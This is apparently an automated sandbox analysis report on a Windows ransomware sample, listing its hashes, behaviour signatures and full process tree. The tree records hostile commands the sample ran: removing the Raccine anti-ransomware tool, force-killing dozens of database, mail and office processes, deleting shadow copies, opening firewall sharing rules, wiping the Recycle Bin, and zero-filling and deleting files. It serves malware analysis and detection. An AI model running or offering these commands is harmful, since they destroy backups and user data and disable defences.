Resubmissions

24-11-2021 13:59

211124-rahp4acghj 10

24-11-2021 09:36

211124-lk29laccgq 8

Analysis

  • max time kernel
    107s
  • max time network
    107s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    24-11-2021 09:36

General

  • Target

    emk21h33.exe

  • Size

    385KB

  • MD5

    54e8989f3595120a430b8d31ca87c0cc

  • SHA1

    30609e95e4396e7c409b21e0d96c185736cc01d2

  • SHA256

    74a717027b6212236662bf641c473b8f8cd65486898b02940357bb9b3035f38a

  • SHA512

    56d102a6723e79e0fd4bf5756cf5fe01c36d62a9f1c0575750c288ab9b6de119ce6675a5156c80f4ed3274962981a14095ced7c9d213f9e9216b4a655ab66206

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Downloads PsExec from SysInternals website 1 IoCs

    Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 58 IoCs
  • Modifies registry class 31 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\emk21h33.exe
    "C:\Users\Admin\AppData\Local\Temp\emk21h33.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1624
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1264
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:340
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:744
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:956
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:1152
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
              PID:1084
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config FDResPub start= auto
              2⤵
                PID:1000
              • C:\Windows\SysWOW64\sc.exe
                "sc.exe" config SSDPSRV start= auto
                2⤵
                  PID:1788
                • C:\Windows\SysWOW64\sc.exe
                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                  2⤵
                    PID:920
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SstpSvc start= disabled
                    2⤵
                      PID:1036
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config upnphost start= auto
                      2⤵
                        PID:1600
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config SQLWriter start= disabled
                        2⤵
                          PID:1308
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:900
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM synctime.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1500
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:940
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1144
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM Ntrtscan.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1980
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1100
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM isqlplussvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1112
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqbcoreservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1724
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1992
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM onenote.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1936
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM firefoxconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1900
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM excel.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:864
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM encsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1696
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM agntsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1532
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM PccNTMon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:968
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbeng50.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1124
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM CNTAoSMgr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1968
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1752
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msaccess.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:896
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat64.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:764
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM outlook.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1884
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM steam.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:624
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocomm.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:456
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlwriter.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:552
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tmlisten.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:928
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" IM thunderbird.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1972
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM infopath.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:964
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tbirdconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1540
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbsnmp.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1532
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msftesql.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1124
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM xfssvccon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1736
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM wordpad.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:960
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mbamtray.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:528
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM powerpnt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1720
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM zoolz.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1552
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld-opt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1064
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1500
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocautoupds.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1900
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM visio.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1936
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocssd.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1000
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1944
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM oracle.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:616
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM winword.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1800
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlagent.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:608
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld-nt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:920
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlbrowser.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:340
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlservr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1980
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ragent.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:888
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqld.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1952
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM rmngr.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:672
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysql.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1732
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:808
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sql.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1696
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM rphost.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:940
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM vmwp.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:588
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM oracle.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1928
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM 1cv8.exe /f
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:684
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                          2⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1576
                        • C:\Windows\SysWOW64\netsh.exe
                          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                          2⤵
                            PID:1788
                          • C:\Windows\SysWOW64\netsh.exe
                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                            2⤵
                              PID:1172
                            • C:\Windows\SysWOW64\arp.exe
                              "arp" -a
                              2⤵
                                PID:900
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                2⤵
                                  PID:532
                                • C:\Windows\SysWOW64\netsh.exe
                                  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                  2⤵
                                    PID:1736
                                  • C:\Windows\SysWOW64\netsh.exe
                                    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                    2⤵
                                      PID:552
                                    • C:\Windows\SysWOW64\arp.exe
                                      "arp" -a
                                      2⤵
                                        PID:1552
                                      • C:\Windows\SysWOW64\notepad.exe
                                        "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
                                        2⤵
                                          PID:1036
                                        • C:\Windows\splwow64.exe
                                          C:\Windows\splwow64.exe 12288
                                          2⤵
                                          • Modifies registry class
                                          • Suspicious use of SetWindowsHookEx
                                          PID:1072
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                          2⤵
                                            PID:616
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 127.0.0.7 -n 3
                                              3⤵
                                              • Runs ping.exe
                                              PID:1852
                                            • C:\Windows\SysWOW64\fsutil.exe
                                              fsutil file setZeroData offset=0 length=524288 “%s”
                                              3⤵
                                                PID:1984
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\emk21h33.exe
                                              2⤵
                                                PID:1548
                                            • C:\Windows\system32\conhost.exe
                                              \??\C:\Windows\system32\conhost.exe "-2039446261-1127730794-1402692226-18580627261930710932-1136011885-724646992-884479599"
                                              1⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:896

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • memory/1072-132-0x000007FEFBC51000-0x000007FEFBC53000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1072-133-0x0000000004140000-0x0000000004141000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1576-125-0x0000000002442000-0x0000000002444000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1576-124-0x0000000002441000-0x0000000002442000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1576-122-0x0000000075B71000-0x0000000075B73000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1576-123-0x0000000002440000-0x0000000002441000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1624-58-0x00000000052E0000-0x00000000052E1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1624-55-0x0000000001170000-0x0000000001171000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1624-134-0x00000000052E5000-0x00000000052F6000-memory.dmp

                                              Filesize

                                              68KB